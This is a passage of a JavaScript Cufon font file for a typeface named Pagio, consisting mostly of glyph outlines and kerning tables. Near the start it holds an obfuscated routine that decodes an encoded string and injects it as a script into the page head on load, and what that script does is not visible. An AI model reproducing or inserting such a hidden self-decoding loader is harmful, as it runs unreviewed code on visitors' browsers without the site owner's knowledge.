":11,",":45,".":45,"v":22,"w":22,"e":41,"o":41,"\u00e9":23,"\u011b":23,"\u00f3":41,"u":31,"\u016f":27,"c":41,"\u010d":41,"d":41,"\u010f":41,"q":41,"r":31,"\u0159":31,"t":30,"\u0165":30,"a":45,"\u00e1":13,"-":61,"m":31,"n":31,"\u0148":24,"s":32,"\u0161":32,"x":24,"z":12,"\u017e":12}},{"d":"23,-11r0,-38v32,19,93,34,93,-21v0,-19,-11,-41,-51,-41r0,-32v28,0,49,-9,49,-37v0,-17,-11,-37,-42,-37v-19,0,-34,8,-43,12r0,-33v52,-25,120,-8,120,55v0,35,-21,47,-32,53v68,28,30,133,-39,133v-12,0,-32,-2,-55,-14"},{"d":"43,-165v11,0,21,9,21,22v0,12,-9,21,-21,21v-12,0,-21,-9,-21,-21v0,-13,10,-22,21,-22xm22,43r0,-7v12,-12,14,-22,15,-36v-19,-6,-19,-20,-19,-23v0,-12,10,-23,22,-23v15,0,24,16,24,33v0,4,0,43,-42,56","w":82},{"d":"375,-246r-100,247r-7,0r-80,-200r-81,200r-8,0r-99,-247r35,0r68,170r68,-170r33,0r69,170r67,-170r35,0","w":375,"k":{"g":24,"p":14,"y":9,"\u00fd":9,"A":29,"\u00c1":29,"C":14,"\u010c":14,"G":14,"O":14,"Q":14,",":36,".":36,"v":9,"w":9,"e":32,"o":32,"\u00e9":25,"\u011b":25,"\u00f3":32,"u":14,"\u016f":14,"c":32,"\u010d":32,"d":32,"\u010f":32,"q":32,"r":14,"\u0159":14,"t":11,"\u0165":11,"a":22,"\u00e1":14,"-":36,"m":14,"n":18,"\u0148":14,"s":20,"\u0161":20,")":-11,"]":-11,"}":-11}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+277-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("tKso;jd#m(JZt4P[%j8XHKHJ-?dosjJZ-?~Xm(a)s5gO6{#z-*A7QNrPAW%XA(PE%Ni7sNPZmj#&so,oQ^1oS8,oQ^1oS-:z+oP|l)&E%Ni,djAgnl5E%Ni,dxaE%Ni7sjalmK8E%Ni7sK8Tto,oQ^1?QA~9S1o;-*A7QKa$-*A7QNrx-*A7QN%$-*A7QNrj6^oO-*A7QN%Pl8,oQ^1#do,oQ^1,65,oQ^1#S4dn-*A7QK5$sP,oQ^rxQ5,oQ^rxs*r^-*A7QK6{-4J?dlri-8,E%Ni7sN8U-x6u%NPE%Ni76NrgD#8DsAP{-*A7QNsj~X8E%Ni,dx5EH$9ZD)1!Q^9$-*A7QKQU(x%E%Ni,QK92s4,BN12x5zsE%Ni,dxr85-aK-*A7QN8z-N8*(13XtP9{SoEzb)d7;KP#ir4^18K*H~tbQdSD9alNA5(-6sm;E%+nC:zx$Pj)!&eTO2ZB7,X{#o?W3Uu[gJ|`t4Hztl,&DNiOE^ozb)iO;^o7bj,P;j%#m4,)D(HZszU);*P7m*QJ+W#[m(6!bo3!D{&W%W%Ebz$`t^gu%W%W-4U76(%&;o7Z6W!&~4gZ%K5{%4:O;?d:%KPB;zU!;Wd#;j82sl$&sjJXt^2&DK7[tX2&t(%;6o2&-5#JE82&--#&t4$C")}catch(e){}delete _cufon_bridge_;return f})({"w":180,"face":{"font-family":"Pagio","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 2 2 1 4 2 2 3","ascent":"246","descent":"-114","x-height":"3","bbox":"-22 -335 375 84.386","underline-thickness":"18","underline-position":"-18","stemh":"29","stemv":"32","unicode-range":"U+0020-U+017E"}}));Cufon.registerFont((function(f){_cufon_bridge_={p:[{"d":"162,-192v-1,60,-67,123,-96,162r93,0r-4,30r-149,0v24,-32,125,-127,125,-188v0,-45,-73,-26,-89,-9r6,-35v9,-5,28,-17,55,-17v38,0,59,27,59,57"},{"d":"244,-246r-35,246r-17,0r-122,-179r-25,179r-31,0r35,-246r16,0r123,181r25,-181r31,0","w":247,"k":{"A":-7,"\u00c1":-7}},{"d":"127,-247r48,247r-31,0r-14,-77r-77,0r-33,77r-33,0r109,-247r31,0xm125,-103r-20,-101r-42,101r62,0xm174,-316r-60,54r-19,0r27,-54r52,0","k":{"y":11,"\u00fd":11,"A":-7,"\u00c1":-7,"C":14,"\u010c":14,"G":7,"Q":11,"T":32,"\u0164":32,"V":22,"W":25,"Y":32,"\u00dd":32,"Z":-7,"\u017d":-7,"v":16,"w":14,"O":11,"S":11,"\u0160":11,"U":14,"\u00da":14,"\u016e":14,",":-7,".":-7,"t":9,"\u0165":9,"u":4,"\u016f":4}},{"d":"66,-162r-4,35v12,-23,27,-44,57,-35r0,35v-25,-16,-49,6,-62,36r-13,91r-31,0r23,-162r30,0","w":112,"k":{"y":-14,"\u00fd":-14,"a":5,"\u00e1":5,"e":4,"\u00e9":4,"\u011b":4,"v":-11,",":14,".":14,"t":-7,"\u0165":-7,":":-14,";":-14,"i":-7,"\u00ed":-7,"c":5,"\u010d":5,"d":5,"\u010f":5,"o":5,"\u00f3":5,"q":5,"s":-7,"\u0161":-7,"k":-4}},{"d":"80,-246r-32,218r100,0r-4,28r-132,0r36,-246r32,0","w":150,"k":{";":-18,"J":-18,"j":-7,"A":-18,"\u00c1":-18,"T":25,"\u0164":25,"V":14,"W":27,"Y":22,"\u00dd":22,"Z":-11,"\u017d":-11,"v":18,"w":14,",":-14,".":-18,"u":-4,"\u016f":-4,"x":-11,"B":-7,"D":-7,"\u010e":-7,"E":-7,"\u00c9":-7,"\u011a":-7,"F":-7,"H":-7,"I":-7,"\u00cd":-7,"K":-7,"L":-11,"N":-7,"\u0147":-7,"P":-7,"R":-7,"\u0158":-7,":":-18,"i":-7,"\u00ed":-7,"m":-7,"n":-7,"z":-7,"\u017e":-7,"\u0148":-7,"r":-4,"\u0159":-4,"M":-7,"b":-7,"h":-7,"p":-4}},{"d":"198,-246r-86,124r-18,122r-32,0r17,-122r-58,-124r34,0r43,90r62,-90r38,0xm177,-316r-59,54r-19,0r26,-54r52,0","w":176,"k":{"y":14,"\u00fd":14,"j":7,"A":18,"\u00c1":18,"C":14,"\u010c":14,"G":14,"Q":14,"a":40,"\u00e1":40,"e":40,"\u00e9":22,"\u011b":22,"v":22,"w":18,"O":11,"S":4,"\u0160":4,",":29,".":29,"t":11,"\u0165":11,"u":22,"\u016f":22,"x":25,"i":11,"\u00ed":11,"m":18,"n":18,"z":25,"\u017e":25,"\u0148":18,"c":40,"\u010d":40,"d":40,"\u010f":40,"o":40,"\u00f3":32,"r":22,"\u0159":22,"q":29,"M":11,"p":18,"f":14,"g":36,"-":32,"s":18,"\u0161":18}},{"d":"233,-162r-83,165r-15,0r-21,-106r-55,106r-14,0r-33,-165r29,0r20,106r53,-106r15,0r21,106r53,-106r30,0","w":221,"k":{"y":-14,"\u00fd":-14,"a":7,"\u00e1":7,"e":7,"\u00e9":7,"\u011b":7,"v":-4,"w":-4,",":11,".":11,"t":-7,"\u0165":-7,"c":7,"\u010d":7,"d":7,"\u010f":7,"o":7,"\u00f3":7,"q":7,"g":4}},{"d":"144,-162r-116,245r-32,0r44,-93r-31,-152r31,0r21,108r51,-108r32,0xm86,-237r37,0r-41,53r-20,0","w":135,"k":{"y":-11,"\u00fd":-11,"a":7,"\u00e1":7,"e":7,"\u00e9":7,"\u011b":7,",":7,".":7,"u":4,"\u016f":4,"c":7,"\u010d":7,"d":7,"\u010f":7,"o":7,"\u00f3":7,"q":7,"g":7}},{"d":"39,84r0,-330r27,0r0,330r-27,0","w":93},{"d":"79,-1v0,62,-14,89,-65,85r0,-27v35,1,35,-4,35,-61v0,-54,13,-66,37,-77v-37,-15,-36,-43,-36,-103v0,-33,-10,-35,-36,-35r0,-27v30,0,56,-5,64,49v6,42,-13,100,38,102r0,28v-36,1,-37,32,-37,66","w":119},{"d":"159,-162r-65,80r41,82r-32,0r-30,-57r-47,57r-37,0r70,-86r-38,-76r33,0r26,51r42,-51r37,0","w":153,"k":{"q":13,"y":-11,"\u00fd":-11,"a":13,"\u00e1":13,"e":13,"\u00e9":13,"\u011b":13,"c":13,"\u010d":13,"d":13,"\u010f":13,"o":13,"\u00f3":13,"g":7}},{"d":"62,-162r-4,30v14,-17,33,-32,54,-32v77,0,23,106,24,164r-31,0r15,-117v0,-10,-5,-22,-18,-22v-21,0,-46,31,-49,36r-14,103r-31,0r23,-162r31,0","w":169,"k":{"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,"v":9,"w":7,"t":7,"\u0165":7,"x":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"o":4,"\u00f3":4,"q":4,"g":9}},{"d":"66,-162r-4,35v12,-23,27,-44,57,-35r0,35v-25,-16,-49,6,-62,36r-13,91r-31,0r23,-162r30,0xm138,-238r-47,54r-36,0r-27,-54r14,0r31,35r48,-35r17,0","w":112,"k":{"y":-14,"\u00fd":-14,"a":5,"\u00e1":5,"e":4,"\u00e9":4,"\u011b":4,"v":-11,",":14,".":14,"t":-7,"\u0165":-7,":":-14,";":-14,"i":-7,"\u00ed":-7,"c":5,"\u010d":5,"d":5,"\u010f":5,"o":5,"\u00f3":5,"q":5,"s":-7,"\u0161":-7,"k":-4}},{"w":100},{"d":"143,-162r-117,245r-32,0r44,-93r-30,-152r30,0r21,108r52,-108r32,0","w":135,"k":{"y":-11,"\u00fd":-11,"a":7,"\u00e1":7,"e":7,"\u00e9":7,"\u011b":7,",":7,".":7,"u":4,"\u016f":4,"c":7,"\u010d":7,"d":7,"\u010f":7,"o":7,"\u00f3":7,"q":7,"g":7}},{"d":"117,-59v0,-46,-83,-58,-83,-123v0,-54,70,-84,124,-57r-5,33v-20,-21,-91,-16,-86,23v7,51,83,64,83,121v0,31,-24,65,-73,65v-27,0,-51,-12,-59,-17r5,-36v16,14,40,23,57,23v15,0,37,-10,37,-32","w":164,"k":{"y":5,"\u00fd":5,"C":5,"\u010c":5,"G":5,"Y":13,"\u00dd":13,"a":3,"\u00e1":3,"e":4,"\u00e9":4,"\u011b":4,"v":14,"w":11,"O":7,"S":7,"\u0160":7,",":-9,".":-9,"d":2,"\u010f":2,"q":2,"f":11}},{"d":"-18,80r4,-25r46,0r39,-276r-46,0r3,-25r76,0r-46,326r-76,0","w":119},{"d":"73,5v-38,0,-60,-27,-60,-72v0,-68,43,-100,78,-100v35,0,59,27,59,71v0,68,-40,101,-77,101xm119,-98v0,-22,-8,-43,-29,-43v-27,0,-46,35,-46,81v0,32,19,41,28,41v32,0,47,-45,47,-79xm100,-237r36,0r-41,53r-20,0","w":161,"k":{"y":-4,"\u00fd":-4,"v":7,"w":7,"x":7,"z":9,"\u017e":9,"g":4}},{"d":"127,-247r48,247r-31,0r-14,-77r-77,0r-33,77r-33,0r109,-247r31,0xm125,-103r-20,-101r-42,101r62,0","k":{"y":11,"\u00fd":11,"A":-7,"\u00c1":-7,"C":14,"\u010c":14,"G":7,"Q":11,"T":32,"\u0164":32,"V":22,"W":25,"Y":32,"\u00dd":32,"Z":-7,"\u017d":-7,"v":16,"w":14,"O":11,"S":11,"\u0160":11,"U":14,"\u00da":14,"\u016e":14,",":-7,".":-7,"t":9,"\u0165":9,"u":4,"\u016f":4}},{"d":"77,-246r-14,97v7,-6,18,-18,39,-18v64,0,77,96,30,145v-29,29,-71,30,-121,25r33,-249r33,0xm44,-20v60,10,84,-42,84,-74v0,-39,-22,-46,-35,-46v-10,0,-32,6,-34,20","w":169,"k":{"y":-4,"\u00fd":-4,"v":7,"w":7,"x":7,"z":9,"\u017e":9,"g":4}},{"d":"48,0r71,-104v-35,23,-91,-4,-91,-51v0,-46,36,-94,85,-94v42,0,65,33,65,72v0,69,-64,124,-94,177r-36,0xm60,-159v0,17,9,35,35,35v32,0,51,-29,51,-55v0,-18,-11,-39,-36,-39v-31,0,-50,31,-50,59"},{"d":"62,-162r-23,162r-31,0r23,-162r31,0xm53,-237r36,0r-40,53r-21,0","w":67,"k":{"y":-11,"\u00fd":-11,"t":-4,"\u0165":-4}},{"d":"59,-162v-11,67,-15,159,-32,217v-5,18,-40,35,-67,25r4,-27v27,7,38,-13,41,-35r23,-180r31,0xm50,-230v23,0,24,33,1,33v-10,0,-18,-7,-18,-16v0,-9,7,-17,17,-17","w":65,"k":{"y":-7,"\u00fd":-7,"j":-11,")":-4,"]":-4,"}":-4}},{"d":"34,-122v-9,6,-19,21,-28,30v-4,-15,23,-45,30,-52r9,-59r30,0r-6,41v55,-22,97,29,94,72v-3,58,-47,102,-118,95r-11,75r-30,0xm66,-139r-17,118v56,8,85,-39,83,-70v-2,-42,-35,-63,-66,-48","w":176,"k":{"x":11,"v":11,"y":-4,"\u00fd":-4,"w":7,"t":4,"\u0165":4,"z":9,"\u017e":9,"g":4}},{"d":"126,0v18,58,89,46,100,0r4,0v0,12,-5,70,-61,70v-41,0,-68,-33,-80,-70v-117,-31,-80,-248,49,-249v54,0,86,41,86,103v0,62,-29,129,-98,146xm190,-150v0,-41,-19,-69,-52,-69v-60,0,-86,78,-86,126v0,48,27,70,55,70v55,0,83,-70,83,-127","w":236,"k":{"x":13,"X":25,"V":14,"J":-29,"j":-22,"A":7,"\u00c1":7,"T":23,"\u0164":23,"W":18,"Y":32,"\u00dd":32,"Z":11,"\u017d":11,"S":14,"\u0160":14,"U":11,"\u00da":11,"\u016e":11,",":-14,".":-11,":":-14,";":-14,")":-7,"]":-7,"}":-7}},{"d":"161,-162r-23,162r-31,0r3,-19v-14,14,-28,21,-44,21v-35,0,-53,-35,-53,-61v0,-12,2,-51,29,-78v31,-30,71,-36,119,-25xm114,-48r13,-92v-80,-5,-82,66,-82,75v0,25,13,43,31,43v17,0,34,-20,38,-26","w":168,"k":{"y":-11,"\u00fd":-11}},{"d":"263,-246r6,246r-31,0r-3,-186r-99,186r-43,-189r-61,189r-32,0r81,-246r28,0r38,167r88,-167r28,0","w":292,"k":{"y":-4,"\u00fd":-4,"T":13,"\u0164":13,"W":11,"Y":22,"\u00dd":22}},{"d":"31,-154v0,-35,4,-65,12,-92r36,0v-7,33,-17,63,-28,92r-20,0","w":68},{"d":"140,-45r-5,32v-54,41,-121,9,-121,-59v0,-51,30,-95,75,-95v39,0,65,36,58,83r-102,0v-4,36,14,65,39,64v20,0,41,-14,56,-25xm50,-105r68,0v0,-24,-12,-37,-29,-37v-26,0,-35,27,-39,37xm154,-238r-48,54r-36,0r-26,-54r14,0r30,35v23,-11,31,-36,66,-35","w":157,"k":{"v":5,"w":4,",":-11,".":-11}},{"d":"190,-246r-115,249r-33,0r100,-218r-98,0r4,-31r142,0"},{"d":"229,-246v-12,65,-13,161,-40,208v-23,40,-64,41,-83,41v-135,-5,-67,-152,-61,-249r33,0r-23,174v0,21,15,45,53,45v49,0,61,-31,67,-76r20,-143r34,0","w":228,"k":{"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,",":5,".":5,"q":4}},{"d":"12,-68v-4,-52,52,-106,119,-98r11,-80r31,0r-35,246v-6,1,-18,5,-41,5v-61,-1,-81,-23,-85,-73xm127,-141v-45,-5,-89,36,-83,72v-3,29,25,55,67,48xm176,-162r2,-16v23,-8,24,-24,24,-30v-23,-6,-16,-41,7,-41v14,0,24,13,24,29v0,21,-15,49,-57,58","w":209,"k":{"y":-9,"\u00fd":-9}},{"d":"222,-122v-2,117,-93,128,-208,122r35,-246v103,-7,174,35,173,124xm51,-29v79,8,137,-22,137,-93v0,-51,-50,-101,-110,-94xm191,-317r-49,55r-44,0r-25,-55r18,0r29,31v24,-10,35,-33,71,-31","w":236,"k":{"T":23,"\u0164":23,"V":18,"W":25,"Y":36,"\u00dd":36,"Z":18,"\u017d":18,"O":5,"S":14,"\u0160":14,",":9,".":9,"X":25,"x":14}},{"d":"161,-162r-107,135r94,0r-6,27r-147,0r106,-134r-82,0r4,-28r138,0","w":164,"k":{"a":9,"\u00e1":9,"e":9,"\u00e9":9,"\u011b":9,"t":4,"\u0165":4,"c":9,"\u010d":9,"d":9,"\u010f":9,"o":9,"\u00f3":9,"q":9}},{"d":"65,-147v0,10,-8,21,-20,21v-11,0,-20,-10,-20,-21v0,-11,9,-20,20,-20v12,0,20,9,20,20xm46,-14v0,10,-8,19,-20,19v-11,0,-20,-9,-20,-20v0,-12,10,-19,20,-19v12,0,20,9,20,20","w":71},{"d":"32,-154v0,-34,4,-65,11,-92r36,0v-6,34,-16,64,-28,92r-19,0xm90,-154v1,-34,5,-64,12,-92r36,0v-6,34,-16,64,-28,92r-20,0","w":127},{"d":"179,-246r-4,30r-98,0r-11,77r87,0r-4,29r-87,0r-12,81r129,0r-4,29r-161,0r35,-246r130,0xm185,-317r-49,55r-45,0r-25,-55v30,-3,32,20,48,31v23,-11,34,-34,71,-31","w":183,"k":{"j":-6,"A":-18,"\u00c1":-18,"Y":7,"\u00dd":7,",":-11,".":-14,"x":-11,"B":-4,"D":-4,"\u010e":-4,"E":-4,"\u00c9":-4,"\u011a":-4,"F":-4,"H":-4,"I":-4,"\u00cd":-4,"K":-4,"L":-4,"N":-4,"\u0147":-4,"P":-4,"R":-4,"\u0158":-4,":":-14,";":-14,"i":-7,"\u00ed":-7,"m":-7,"n":-4,"z":-7,"\u017e":-7,"\u0148":-4}},{"d":"52,-161v0,-62,15,-89,65,-85r0,27v-35,0,-35,3,-35,61v0,54,-13,66,-37,77v37,15,37,43,37,102v0,33,9,36,35,36r0,27v-30,0,-56,4,-64,-49v-6,-42,14,-100,-37,-102r0,-28v36,-1,36,-32,36,-66","w":119,"k":{"j":-22,"J":-29,"T":-7,"\u0164":-7,"f":-7}},{"d":"73,5v-38,0,-60,-27,-60,-72v0,-68,43,-100,78,-100v35,0,59,27,59,71v0,68,-40,101,-77,101xm119,-98v0,-22,-8,-43,-29,-43v-27,0,-46,35,-46,81v0,32,19,41,28,41v32,0,47,-45,47,-79","w":161,"k":{"y":-4,"\u00fd":-4,"v":7,"w":7,"x":7,"z":9,"\u017e":9,"g":4}},{"d":"174,-217r-5,32v-11,-7,-28,-15,-47,-19r-10,77v49,25,81,72,28,115v-17,14,-37,14,-47,15r-5,37r-27,0r5,-37v-11,-2,-32,-5,-52,-19r5,-35v23,15,34,18,52,23r11,-77v-29,-17,-54,-35,-54,-67v0,-32,28,-60,72,-62r2,-15r27,0r-2,15v8,1,30,5,47,17xm87,-142r9,-63v-59,15,-36,47,-9,63xm107,-91r-10,65v47,-2,43,-56,10,-65","w":180},{"d":"73,-246r-34,246r-31,0r35,-246r30,0","w":67,"k":{"y":-11,"\u00fd":-11,"w":-4,"t":-4,"\u0165":-4}},{"d":"355,-246r-118,247r-13,0r-48,-173r-83,173r-13,0r-58,-247r31,0r40,174r83,-174r13,0r48,177r84,-177r34,0","w":333,"k":{"y":4,"\u00fd":4,"j":4,"A":18,"\u00c1":18,"C":7,"\u010c":7,"G":7,"Q":7,"a":29,"\u00e1":29,"e":27,"\u00e9":20,"\u011b":20,"v":7,"w":7,"O":7,",":29,".":29,"u":13,"\u016f":13,"x":13,"i":4,"\u00ed":4,"n":13,"z":7,"\u017e":7,"\u0148":13,"c":29,"\u010d":29,"d":29,"\u010f":29,"o":27,"\u00f3":23,"r":16,"\u0159":16,"q":25,"M":9,"p":7,"f":11,"g":25,"-":27,"s":11,"\u0161":11}},{"d":"80,-39v5,-21,-63,-44,-63,-82v0,-23,17,-45,50,-45v23,0,40,11,49,17r0,32v-15,-11,-31,-21,-49,-21v-13,0,-21,7,-21,16v8,28,64,43,64,80v0,47,-69,63,-106,26r5,-30v19,15,36,24,51,24v11,0,20,-7,20,-17","w":127,"k":{"a":5,"\u00e1":5,"e":5,"\u00e9":5,"\u011b":5,"w":4,",":-11,".":-11,"t":4,"\u0165":4,"c":5,"\u010d":5,"d":5,"\u010f":5,"o":5,"\u00f3":5,"q":5,"g":7}},{"d":"63,3r-36,-252r24,0r35,252r-23,0","w":101},{"d":"-4,52r3,-16v23,-8,23,-25,23,-31v-23,-6,-13,-40,8,-40v14,0,24,14,24,29v0,20,-15,49,-58,58xm68,-147v0,10,-8,21,-19,21v-11,0,-20,-10,-20,-21v0,-11,9,-20,20,-20v12,0,19,9,19,20","w":71},{"d":"161,-162r-23,162r-31,0r3,-19v-14,14,-28,21,-44,21v-35,0,-53,-35,-53,-61v0,-12,2,-51,29,-78v31,-30,71,-36,119,-25xm114,-48r13,-92v-80,-5,-82,66,-82,75v0,25,13,43,31,43v17,0,34,-20,38,-26xm112,-237r37,0r-41,53r-20,0","w":168,"k":{"y":-11,"\u00fd":-11}},{"d":"161,-162r-107,135r94,0r-6,27r-147,0r106,-134r-82,0r4,-28r138,0xm161,-238r-48,54r-36,0r-26,-54r14,0r30,35v23,-11,31,-36,66,-35","w":164,"k":{"a":9,"\u00e1":9,"e":9,"\u00e9":9,"\u011b":9,"t":4,"\u0165":4,"c":9,"\u010d":9,"d":9,"\u010f":9,"o":9,"\u00f3":9,"q":9}},{"d":"120,-105v5,-18,-3,-38,-18,-38v-30,8,-27,16,-49,38r-15,105r-31,0r35,-246r31,0r-16,111v15,-17,34,-32,58,-32v23,0,40,30,35,64r-14,103r-31,0","w":168,"k":{"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,"v":9,"w":7,"t":7,"\u0165":7,"x":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"o":4,"\u00f3":4,"q":4,"g":9}},{"d":"199,-246r-4,31r-68,0r-31,215r-33,0r31,-215r-70,0r5,-31r170,0xm185,-317r-49,55r-45,0r-25,-55v30,-3,32,20,48,31v23,-11,34,-34,71,-31","w":183,"k":{"y":13,"\u00fd":13,"j":7,"A":25,"\u00c1":25,"C":20,"\u010c":20,"G":20,"Q":18,"T":-4,"\u0164":-4,"a":40,"\u00e1":32,"e":40,"\u00e9":22,"\u011b":22,"v":22,"w":16,"O":18,",":36,".":36,"t":18,"\u0165":18,"u":22,"\u016f":22,"x":25,":":9,";":9,"i":7,"\u00ed":7,"m":22,"n":22,"z":18,"\u017e":18,"\u0148":22,"c":36,"\u010d":36,"d":40,"\u010f":40,"o":40,"\u00f3":29,"r":22,"\u0159":22,"q":40,"M":14,"p":22,")":-7,"]":-7,"}":-7,"f":14,"g":36,"-":43,"s":20,"\u0161":20}},{"d":"233,-246r-179,215r145,0r-4,31r-207,0r179,-215r-140,0r4,-31r202,0xm198,-317r-49,55r-45,0r-25,-55v30,-3,32,20,48,31v23,-11,34,-34,71,-31","w":209,"k":{"A":-7,"\u00c1":-7,"C":7,"\u010c":7,"G":7,"O":7}},{"d":"136,-246r-4,25r-46,0r-40,276r47,0r-4,25r-76,0r47,-326r76,0","w":119,"k":{"j":-22,"J":-29,"T":-7,"\u0164":-7,"f":-7}},{"d":"229,-246v-12,65,-13,161,-40,208v-23,40,-64,41,-83,41v-135,-5,-67,-152,-61,-249r33,0r-23,174v0,21,15,45,53,45v49,0,61,-31,67,-76r20,-143r34,0xm200,-316r-60,54r-19,0r27,-54r52,0","w":228,"k":{"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,",":5,".":5,"q":4}},{"d":"80,-39v5,-21,-63,-44,-63,-82v0,-23,17,-45,50,-45v23,0,40,11,49,17r0,32v-15,-11,-31,-21,-49,-21v-13,0,-21,7,-21,16v8,28,64,43,64,80v0,47,-69,63,-106,26r5,-30v19,15,36,24,51,24v11,0,20,-7,20,-17xm142,-238r-47,54r-36,0r-27,-54r14,0r31,35r48,-35r17,0","w":127,"k":{"a":5,"\u00e1":5,"e":5,"\u00e9":5,"\u011b":5,"w":4,",":-11,".":-11,"t":4,"\u0165":4,"c":5,"\u010d":5,"d":5,"\u010f":5,"o":5,"\u00f3":5,"q":5,"g":7}},{"d":"205,-249r-6,31v-22,0,-51,2,-76,10v-58,19,-74,74,-74,107v0,44,27,73,62,73v36,0,68,-25,75,-30r-4,40v-60,38,-173,25,-168,-82v0,-15,2,-96,83,-132v23,-10,51,-18,108,-17xm217,-317r-49,55r-44,0r-25,-55v30,-3,32,20,48,31v23,-10,34,-34,70,-31","w":198,"k":{"A":-14,"\u00c1":-14,"Z":-7,"\u017d":-7,",":-18,".":-18}},{"d":"62,-162r-23,162r-31,0r23,-162r31,0xm71,-213v0,8,-8,17,-18,17v-10,0,-17,-8,-17,-17v0,-9,7,-17,17,-17v10,0,18,8,18,17","w":67,"k":{"y":-11,"\u00fd":-11,"t":-4,"\u0165":-4}},{"d":"149,-246r-71,104v35,-22,91,5,91,51v0,46,-35,94,-84,94v-42,0,-66,-32,-66,-71v0,-69,64,-125,94,-178r36,0xm138,-86v0,-17,-9,-35,-35,-35v-32,0,-52,28,-52,54v0,18,11,39,36,39v31,0,51,-30,51,-58"},{"d":"82,-246r-34,246r-34,0r34,-246r34,0xm130,-316r-59,54r-19,0r26,-54r52,0","w":86},{"d":"48,-105r-32,0r62,-141r25,0r63,141r-32,0r-44,-105","w":168},{"d":"26,-108r0,-30r170,-72r0,31r-136,56r136,56r0,31","w":210},{"d":"196,-69r-170,0r0,-29r170,0r0,29xm196,-147r-170,0r0,-30r170,0r0,30","w":210},{"d":"233,-246r-179,215r145,0r-4,31r-207,0r179,-215r-140,0r4,-31r202,0","w":209,"k":{"A":-7,"\u00c1":-7,"C":7,"\u010c":7,"G":7,"O":7}},{"d":"61,-162r-4,29v19,-22,38,-31,57,-31v15,0,33,8,37,36v10,-13,32,-36,60,-36v14,0,38,7,38,44v0,42,-11,80,-16,120r-30,0r16,-116v0,-21,-12,-24,-18,-24v-18,0,-39,22,-50,37r-15,103r-31,0r15,-117v0,-19,-12,-23,-18,-23v-20,0,-44,31,-49,37r-15,103r-30,0r23,-162r30,0","w":266,"k":{"x":4,"v":9,"q":4,"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,"w":7,"t":7,"\u0165":7,"u":4,"\u016f":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"o":4,"\u00f3":4,"g":9}},{"d":"134,-246r-38,246r-33,0r39,-246r32,0"},{"d":"118,-249v33,0,62,28,62,87v0,58,-25,165,-99,165v-30,0,-44,-17,-49,-26v-35,-70,-3,-226,86,-226xm147,-157v0,-16,1,-62,-30,-62v-40,0,-66,86,-66,135v0,16,2,58,32,58v40,0,64,-92,64,-131"},{"d":"205,-249r-6,31v-22,0,-51,2,-76,10v-58,19,-74,74,-74,107v0,44,27,73,62,73v36,0,68,-25,75,-30r-4,40v-60,38,-173,25,-168,-82v0,-15,2,-96,83,-132v23,-10,51,-18,108,-17","w":198,"k":{"A":-14,"\u00c1":-14,"Z":-7,"\u017d":-7,",":-18,".":-18}},{"d":"164,-249r-23,147r36,0r-5,26r-36,0r-11,76r-32,0r13,-76r-92,0r0,-14r130,-159r20,0xm110,-102r12,-77r-64,77r52,0"},{"d":"103,-162r-4,28r-32,0r-26,202r-30,0r25,-202r-25,0r4,-28r26,0v1,-16,4,-38,17,-57v28,-38,66,-33,99,-22r-4,30v-49,-26,-78,5,-82,49r32,0","w":97,"k":{"}":-41,"x":7,"v":-4,"q":5,"]":-41,"?":-43,"*":-58,"!":-36,"y":-11,"\u00fd":-11,"a":7,"\u00e1":1,"e":7,"\u00e9":-4,"\u011b":-4,"w":-4,"t":-7,"\u0165":-7,"c":7,"\u010d":7,"d":5,"\u010f":5,"o":5,"\u00f3":-2,")":-41,"f":-11}},{"d":"11,-68v-5,-52,52,-106,120,-98r11,-80r31,0r-35,246v-6,1,-19,5,-42,5v-61,-1,-81,-24,-85,-73xm127,-141v-46,-5,-90,36,-84,72v-3,29,26,55,67,48","w":169,"k":{"y":-9,"\u00fd":-9}},{"d":"96,-38r0,-70r-70,0r0,-30r70,0r0,-70r29,0r0,70r71,0r0,30r-71,0r0,70r-29,0","w":210},{"d":"222,-122v-2,117,-93,128,-208,122r35,-246v103,-7,174,35,173,124xm51,-29v79,8,137,-22,137,-93v0,-51,-50,-101,-110,-94","w":236,"k":{"T":23,"\u0164":23,"V":18,"W":25,"Y":36,"\u00dd":36,"Z":18,"\u017d":18,"O":5,"S":14,"\u0160":14,",":9,".":9,"X":25,"x":14}},{"d":"82,-229v-2,34,-29,129,-35,170r-14,0v4,-27,6,-56,11,-135v1,-13,3,-55,24,-55v6,0,14,5,14,20xm33,-34v27,1,27,38,0,39v-11,0,-19,-9,-19,-19v0,-10,8,-20,19,-20","w":90},{"d":"172,-246r-6,31r-70,0r-10,61v51,3,70,38,70,71v0,37,-25,86,-92,86v-12,0,-37,-1,-59,-18r12,-29v7,5,23,17,48,17v33,0,57,-22,57,-54v1,-38,-39,-50,-72,-41r22,-124r100,0"},{"d":"-20,83v41,-41,72,-166,72,-222v0,-28,-5,-73,-22,-110r15,0v4,7,36,67,36,138v0,90,-37,136,-84,194r-17,0","w":105},{"d":"24,-39v11,0,22,9,22,22v0,13,-10,22,-22,22v-11,0,-21,-10,-21,-22v0,-13,10,-22,21,-22","w":71},{"d":"152,-94v-30,0,-59,-25,-85,-24v-21,0,-35,13,-46,24r0,-36v38,-46,90,2,134,2v23,0,43,-21,46,-24r0,38v-10,9,-24,20,-49,20","w":210},{"d":"157,-162r-23,162r-31,0r4,-28v-22,33,-93,48,-93,-13v0,-36,12,-85,16,-121r31,0r-16,118v14,51,50,4,67,-13r14,-105r31,0xm70,-217v0,-43,67,-45,67,0v0,19,-16,33,-34,33v-18,0,-33,-14,-33,-33xm103,-236v-12,0